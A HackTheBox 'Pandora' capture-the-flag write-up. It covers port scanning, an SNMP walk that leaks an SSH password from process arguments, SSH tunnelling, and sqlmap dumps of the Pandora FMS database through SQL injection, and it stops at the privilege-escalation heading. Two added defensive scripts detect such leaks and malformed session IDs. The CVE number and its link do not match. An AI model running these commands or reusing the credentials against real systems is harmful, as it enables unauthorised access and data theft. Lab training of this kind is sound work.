# Pandora 10.10.11.136

## **Background**

**Pandora** is a Linux-based machine from [HackTheBox](https://app.hackthebox.eu/machines/359) that requires patience with web searching techniques and some encoding concepts; Python hacking skill is required for the privilege escalation.

**Target Machine**: 10.10.11.136

**Attacker Machine**: 10.10.14.4

## **Hacking Process Part 0 – Service Scanning**

### Nmap

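```
# 1) scan all TCP ports and save the result in grepable format
nmap -p- -T5 --min-rate=1000 10.10.11.136 -oG fkclai.nmap
# 2) run default scripts and version detection against the open ports only
nmap -p $(grep -Eo '[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.11.136 -o nmap-result.txt
```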

![](/files/2UaAsnwCwjy2TdgqP1Kh)

**Enumeration Strategies**

No vulnerability was found on the SSH and HTTP services, so the next step was to review the web application for information leakage or misconfiguration.

## **Hacking Process Part 1 – Enumeration**

Basic web enumeration with gobuster found a set of web pages; the following one was interesting because it has a submission function. **However,** nothing interesting was found in it.

![](/files/yA5SfqwlOHEyYTEhCqdD)

![dirb http://pandora.htb/ /usr/share/wordlists/dirb/common.txt -o dirb-pandora.result](/files/58rF2zgojkRPoi6PAkTV)

{% hint style="success" %}
**THINKING:** check the UDP ports

`nmap -sC -sV -sU -top-ports=20 pandora.htb`
{% endhint %}

```
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.27s latency).

PORT      STATE         SERVICE      VERSION
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open          snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 20m46s
| snmp-processes: 
|   1: 
| 
|   2: 
| 
|   3: 
| 
|_  4: 
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 20m46.36s (124636 timeticks)
|_snmp-win32-software: 
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown
Service Info: Host: pandora

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.89 seconds
```

Checking the open ports one by one

#### SNMP Port 161

{% embed url="<https://book.hacktricks.xyz/pentesting/pentesting-snmp>" %}

```
# using the command snmpwalk
snmpwalk -v 2c pandora.htb -c public > smpwalk.result

# relevant line from the result: the arguments of a running process
iso.3.6.1.2.1.25.4.2.1.5.870 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
```

This gives a username `daniel` and a password `HotelBabylon23`; try the SSH connection with this account.
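The leak above comes from the process-argument table (`hrSWRunParameters`) being readable with the `public` community. The following audit check is an added example, not part of the original writeup: it parses `snmpwalk` output taken from your own host and reports processes whose arguments carry a secret-looking option. The option list, the sample lines and the `backup_job` name are assumptions made for illustration.

```python
import re

# hrSWRunParameters (HOST-RESOURCES-MIB): command-line arguments of each
# running process; net-snmp prints the numeric OID with an "iso." prefix.
HR_SW_RUN_PARAMETERS = "iso.3.6.1.2.1.25.4.2.1.5."
WALK_LINE = re.compile(r'^(\S+) = STRING: "(.*)"$')
# Assumed heuristic: option names that usually precede a secret.
SECRET_ARG = re.compile(
    r"""(?:^|[\s'"])(-p|--password|--pass|--token|--secret)(?:=|\s+)([^\s'"]+)"""
)

# Constructed sample in snmpwalk output format (placeholder values only).
SAMPLE_WALK = """\
iso.3.6.1.2.1.25.4.2.1.2.812 = STRING: "sshd"
iso.3.6.1.2.1.25.4.2.1.5.812 = STRING: "-D -p 22"
iso.3.6.1.2.1.25.4.2.1.5.901 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/backup_job -u svc -p EXAMPLE-PASSWORD'"
iso.3.6.1.2.1.25.4.2.1.5.950 = STRING: "--config /etc/app.conf"
"""


def _is_secret(match):
    # "-p 22" is far more likely a port number than a password.
    return not (match.group(1) == "-p" and match.group(2).isdigit())


def _redact(match):
    if not _is_secret(match):
        return match.group(0)
    return match.group(0)[: match.start(2) - match.start(0)] + "<redacted>"


def find_exposed_secrets(walk_text):
    """Return (pid, options, redacted_args) per process leaking a secret."""
    findings = []
    for line in walk_text.splitlines():
        parsed = WALK_LINE.match(line.strip())
        if not parsed or not parsed.group(1).startswith(HR_SW_RUN_PARAMETERS):
            continue
        pid = int(parsed.group(1)[len(HR_SW_RUN_PARAMETERS):])
        args = parsed.group(2)
        options = [m.group(1) for m in SECRET_ARG.finditer(args) if _is_secret(m)]
        if options:
            # Redact so the audit report does not repeat the leak.
            findings.append((pid, options, SECRET_ARG.sub(_redact, args)))
    return findings


if __name__ == "__main__":
    print(find_exposed_secrets(SAMPLE_WALK))
```

Any finding means the secret should be moved out of the command line (a root-only file or environment) and the SNMP view narrowed so the process table is no longer served to the default community.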

![](/files/pUDOpPefGg0OYTpBhbHD)

## **Hacking Process Part 2 –** Gaining Foothold

Get initial access using the credential found in the SNMP output.

![](/files/mHKNIQhhYNeJUtMNEZp3)

Unfortunately, this account cannot access user.txt.

<div align="left"><img src="/files/xhVoAwd9EntHvSw33YIR" alt=""></div>

Reviewing the network showed that a website is hosted internally, but it cannot be accessed from outside.

![](/files/Zus0cudOEeuT6JCFoXqE)

Try to use SSH tunnelling to redirect the page outside.

![ssh -L 81:127.0.0.1:80 daniel@pandora.htb](/files/LIKOIAgPlTILQCGz00F8)

![The credential found before cannot log in to this website](/files/q5ZRXXQPhkCgzUCFPkrs)

A [CVE-2020-5844](https://nvd.nist.gov/vuln/detail/CVE-2020-26518#range-6019001) was found for this version, v7.0NG.742\_FIX\_PERL2020: an SQL injection vulnerability. Using SQLMap to check the

<div align="left"><img src="/files/jJmkIKKZlju5z2hx43oA" alt=""></div>

![sqlmap -u "http://127.0.0.1:81/pandora\_console/include/chart\_generator.php?session\_id=1" --batch --dbms=mysql -D pandora -T tsessions\_php -C id\_session,data --dump](/files/JawQNHYGU3avmR58kPyZ)

The database name (pandora), the table tsessions\_php and the related fields were identified. The command was changed and executed again.

![sqlmap -u "http://127.0.0.1:81/pandora\_console/include/chart\_generator.php?session\_id=1" --batch --dbms=mysql -D pandora -T tpassword\_history -C id\_pass,id\_user,data\_end,password,data\_begin --dump](/files/cChV8s96569FkFEVtzmi)
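The injection point is the `session_id` parameter of `chart_generator.php`, and a PHP session ID only ever contains letters, digits, `,` and `-`, so anything else in that parameter is a strong detection signal. The following log check is an added example, not part of the original writeup; it assumes Apache combined-format access logs, and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/pandora_console/include/chart_generator.php"
# PHP-generated session IDs only contain these characters.
VALID_SESSION_ID = re.compile(r"[A-Za-z0-9,-]{1,256}")
# Client address and request target of an Apache combined-format log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

# Constructed log lines; addresses, times and values are placeholders.
# Requests sent through an SSH local forward arrive from 127.0.0.1.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2022:10:00:00 +0000] "GET /pandora_console/include/'
    'chart_generator.php?session_id=4f1c9ab27d03e5a8b6c1d2e3f4a5b6c7 HTTP/1.1" 200 812',
    '127.0.0.1 - - [10/Jan/2022:10:00:01 +0000] "GET /pandora_console/include/'
    'chart_generator.php?session_id=1%27%20OR%20%271%27=%271 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Jan/2022:10:00:02 +0000] "GET /pandora_console/index.php'
    '?session_id=%27 HTTP/1.1" 200 100',
]


def suspicious_session_ids(log_lines):
    """Return (client, decoded_value) for each request to chart_generator.php
    whose session_id could not have been issued by PHP."""
    findings = []
    for line in log_lines:
        parsed = REQUEST.match(line)
        if not parsed:
            continue
        client, target = parsed.groups()
        url = urlsplit(target)
        if url.path != TARGET_PATH:
            continue
        # parse_qs percent-decodes; keep_blank_values also catches "session_id=".
        values = parse_qs(url.query, keep_blank_values=True).get("session_id", [])
        for value in values:
            if not VALID_SESSION_ID.fullmatch(value):
                findings.append((client, value))
    return findings


if __name__ == "__main__":
    for client, value in suspicious_session_ids(SAMPLE_LOG):
        print(f"{client}: malformed session_id {value!r}")
```

The same character-set test works as an input filter in front of the console while the installation is being upgraded to a fixed release.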

## **Hacking Process Part 3 –** Privilege Escalation


